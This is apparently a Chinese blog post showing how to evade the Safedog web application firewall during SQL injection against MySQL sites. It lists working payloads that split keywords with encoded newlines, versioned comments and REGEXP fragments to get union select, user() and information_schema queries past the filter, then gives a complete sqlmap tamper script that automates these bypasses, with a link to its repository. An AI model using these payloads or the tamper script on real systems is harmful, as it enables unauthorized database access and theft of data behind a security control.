0x00：前言

安全狗又偷偷摸摸更新了

0x01：繞過

之前安全狗就像沒開發(fā)完一樣，簡單內(nèi)聯(lián)就過去了，但是現(xiàn)在的安全狗搖身一變，變得穩(wěn)重了起來。

就連報(bào)錯(cuò)界面都變成了大人的模樣。

看這架勢，不好過啊

首先 and 內(nèi)斂注釋依舊是可以過的，看來安全狗并沒有太過關(guān)注and，可能是覺得后面的規(guī)則比較牛，知道有注入也沒用？

然后是order by ，從這里開始，事情就變得微妙了起來

猜測規(guī)則是order by 組合強(qiáng)規(guī)則，意思就是order by中間無論加什么都過不去

隨便試一試

果然，但是有沒有發(fā)現(xiàn)，我fuzz的符號里沒有加＃號，因?yàn)榧恿司蜁@樣

由于錨點(diǎn)這個(gè)特殊性，盲猜這是一個(gè)突破點(diǎn)

可能安全狗遇到注釋也會直接截?cái)嗟艉竺娴恼Z句（類似某鎖），那就好說了，構(gòu)造個(gè)注釋在語句前面即可

居然沒過，小看你了安全狗，看來order by規(guī)則還沒失效，那么 嘗試隔斷order by

中間加個(gè)%0a

輕輕松松

接下來是union select 組合

同理，也可以這樣過

1'  REGEXP "[…%0a%23]"    /*!11444union %0a select*/ 1,2,3 --+

下一個(gè)是user()這類函數(shù)，這里也是個(gè)坑，發(fā)現(xiàn)直接括號會被攔

去一個(gè)右括號就沒事了，這規(guī)則也是無語

既然如此，在括號里下文章即可

依然是換行加注釋繞過

-1'  REGEXP "[…%0a%23]"    /*!11444union %0a select*/ 1,user(%0a /*!80000aaa*/),3 -- +

然后是INFORMATION_SCHEMA 這玩意，居然也被加到了規(guī)則里，

沒關(guān)系，繼續(xù)構(gòu)造換行注釋，

-1'  REGEXP "[…%0a%23]"    /*!11444union %0a select*/ 1,(select %0a group_concat(schema_name %0a /*80000aaa*/) %0a from %0a /*!11444 /*REGEXP "[…%0a%23]"*/ %0a information_schema.schemata*/),3-- +

0x02：tamper

#!/usr/bin/env python
# -*- coding: utf-8 -*-



"""
Copyright (c) 2006-2019 sqlmap developers (http:%23 %26%23 %26sqlmap.org%23 %26)
See the file 'LICENSE' for copying permission
Author:pureqh.top
"""

import re
import os

from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.LOW

def dependencies():
    singleTimeWarnMessage("Bypass safedog by pureqh'%s' only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def tamper(payload, **kwargs):

        payload=payload.replace(" ","  ",1)
        payload=payload.replace("ORDER BY","REGEXP \"[...%25%23]\"   /*!11444order %0a by*/")
        payload=payload.replace("union ALL SELECT","/*!11444union all%0a select*/")
        payload=payload.replace(" AND","/*!11444AND*/")
        payload=payload.replace("(SELECT (CASE","(/*!11444SELECT*/ %0a (CASE")
        payload=payload.replace("UNION SELECT","/*!11444union*/  /*REGEXP \"[...%25%23]\"*/  %0a select /*REGEXP \"[...%25%23]\"*/")
        payload=payload.replace("UNION ALL SELECT","REGEXP \"[...%0a%23]\" /*!11444union %0a select */ ")
        payload=payload.replace("()","(%0a /*!80000aaa*/)")
        payload=payload.replace(" AS","/*!11444AS*/")
        payload=payload.replace("FROM","/*!11444FROM*/")
        payload=payload.replace("INFORMATION_SCHEMA","/*like\"%0a%23\"*/ %0a  INFORMATION_SCHEMA")
        payload=payload.replace("INFORMATION_SCHEMA.TABLES","%0a /*!11444INFORMATION_SCHEMA.TABLES*/")

        return payload

題外話 某鎖也能這樣過

代碼已更新至github

https://github.com/pureqh/bypasswaf

[超站]友情鏈接：

四季很好，只要有你，文娛排行榜：https://www.yaopaiming.com/
關(guān)注數(shù)據(jù)與安全，洞悉企業(yè)級服務(wù)市場：https://www.ijiandao.com/